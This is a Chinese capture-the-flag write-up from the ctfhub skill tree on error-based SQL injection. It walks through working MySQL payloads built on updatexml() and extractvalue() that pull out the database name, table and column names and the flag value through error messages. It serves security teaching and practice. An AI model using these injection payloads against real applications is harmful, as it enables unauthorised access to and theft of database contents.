题目来源：ctfhub技能树

目录

一、基本操作：整理已知信息，本题为报错注入，需进一步确认回显方式

二、用updatexml()解题步骤

step 1：依据回显方式判断题目类型

step 2：查看字段名

step 3：确定报错函数updatexml()可用

step 4：爆数据库名

step 5：爆表名

step 6：爆列名

step 7：爆具体数据

三、用extractvalue()函数解题步骤

step 4：爆数据库名

step 5：爆所有的表名

step 6：爆列名

step 7：爆具体数据

四、updatexml()函数和extractvalue()函数的区别

---

一、基本操作：整理已知信息，本题为报错注入，需进一步确认回显方式

二、用updatexml()解题步骤

step 1：依据回显方式判断题目类型

键入：1、1 and 1=1 、id=2-1

得到：查询正确的回显

键入：1’、1' and 1=1

得到：错误回显，但是错误回显中并没有数字1，第一个和第三个引号是SQL数据库自带符号，中间是输入的内容，但报错内容只框住了单引号，说明单引号前的内容没有问题，所以还是数字型注入

step 2：查看字段名

多次尝试查询字段数

sql">1 order by 3

sql">1 order by 2

step 3：确定报错函数updatexml()可用

updatexml()函数

一般形式：updatexml (XML_document, XPath_string, new_value)

参数：

XML_document：是一个有效的 XML 文档对象，可以是一个字符串形式的 XML 文档。

XPath_string：是一个 XPath 表达式，用于指定要更新的节点在 XML 文档中的位置。XPath 是一种用于在 XML 文档中查找信息的语言。

new_value：是要更新到指定节点的新值。

sql">1 and updatexml(1,0x7e,3) -- a

payload解释：第一个参数和第三个参数都不符合要求，目的是引发报错，第二个参数中7e对应的ASCII字符是~，目的是引发SQL报错；最后的-- a是SQL注释掉后面的语句

updatexml()的主要目的：引发报错

step 4：爆数据库名

sql">1 and updatexml(1,concat('~',database(),'~'),1) -- a

注：这里的concat()函数是用于将多个字符串连接成一个字符串的函数

step 5：爆表名

sql">1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = 'sqli' ),'~'),1) -- a

注：这里的group_concat()函数是用于将分组后的字符串连接起来；concat()函数的中间参数（爆数据库名核心语句）要括号括起来，其余一样

step 6：爆列名

sql">1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'),'~'),3) #

step 7：爆具体数据

sql">1 and updatexml(1,concat('~',(select concat(flag) from sqli.flag),'~'),1) -- a

三、用extractvalue()函数解题步骤

extractvalue()函数

一般形式：extractvalue (XML_document, XPath_string)

XML_document：是一个有效的 XML 文档对象，可以是一个字符串形式的 XML 文档

XPath_string：是一个 XPath 表达式，用于指定要从XML_document中提取的节点或节点值的位置

前面重复部分见前面详情

接

step 4：爆数据库名

sql">1 and extractvalue(1,concat(0x7e,database(),0x7e)) #

注：这里extractvalue()函数中第一个参数是满足函数参数要求，第二个参数是构造特定的报错信息

step 5：爆所有的表名

sql">​1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) #

step 6：爆列名

sql">1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e)) #

step 7：爆具体数据

sql">1 and extractvalue(1,concat(0x7e,(select flag from sqli.flag),0x7e)) #

四、updatexml()函数和extractvalue()函数的区别

        具体区别在于updatexml()函数有三个参数，extractvalue()函数有两个参数，核心语句与整数型注入无差别，这里同样要加 # 或 -- a 将剩余部分注释掉